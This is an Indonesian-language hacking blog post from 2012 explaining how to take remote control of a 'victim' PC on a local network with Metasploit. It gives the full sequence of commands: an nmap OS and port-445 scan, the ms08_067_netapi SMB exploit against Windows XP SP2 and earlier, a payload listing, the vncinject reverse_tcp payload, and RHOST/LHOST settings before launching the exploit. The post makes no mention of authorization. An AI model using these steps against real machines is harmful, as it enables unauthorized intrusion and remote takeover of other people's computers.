Friday 9 November 2012

cara remote pc dengan metasploit

Remote PC dengan Metasploit!!!!!!!

Bookmark and Share
Pada Tutorial hacking kali ini saya akn jelaskan cara Remote PC dengan Metasploit.
Software ini hanya bisa digunakan untuk mengendalikan komputer or laptop lewat jaringan wireless saja.

persiapan yg di perlukan antara lain:
1.Metasploit versi berapa aj, karena sekarang udah versi 3.3.4 maka kita akan
memakai versi baru tersebut tool ini bisa di download di sini

2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren ),,tp gw pk windows aj..hehe..
3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya
4.Ip dari komputer korban (disini gw cb exploit 192.168.1.31)
5.siapin aj apa yg perlu mnurut bro perlu biat gak bosen nunggu,, Tounge.gif

pertama install metasploitnya, klo di windows tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya

./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)

klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).

pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc di 1 jaringan,mo pk cain n avbel or netcut jg bisa,,klo gw sih sering make
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya

( simulation on micr*soft windows)
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 484 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r8002 updated today (2009.12.28)

msf >



kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap

nmap -v -O -p445 192.168.1.31

command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya

ketikan di jendela msf(metasploit)

show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan

karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah

dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show payloads

TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager


ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload

windows/vncinject/reverse_tcp

setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp

setelah itu kita set ip dari target

set RHOST 192.168.1.31 -----> komputer korban

set LHOST 192.168.1.37 -----> komputer kita

klo udah selesai kita tinggal launch exploit di msf

tinggal ketik

exploit
Semoga berhasil......

No comments:

Post a Comment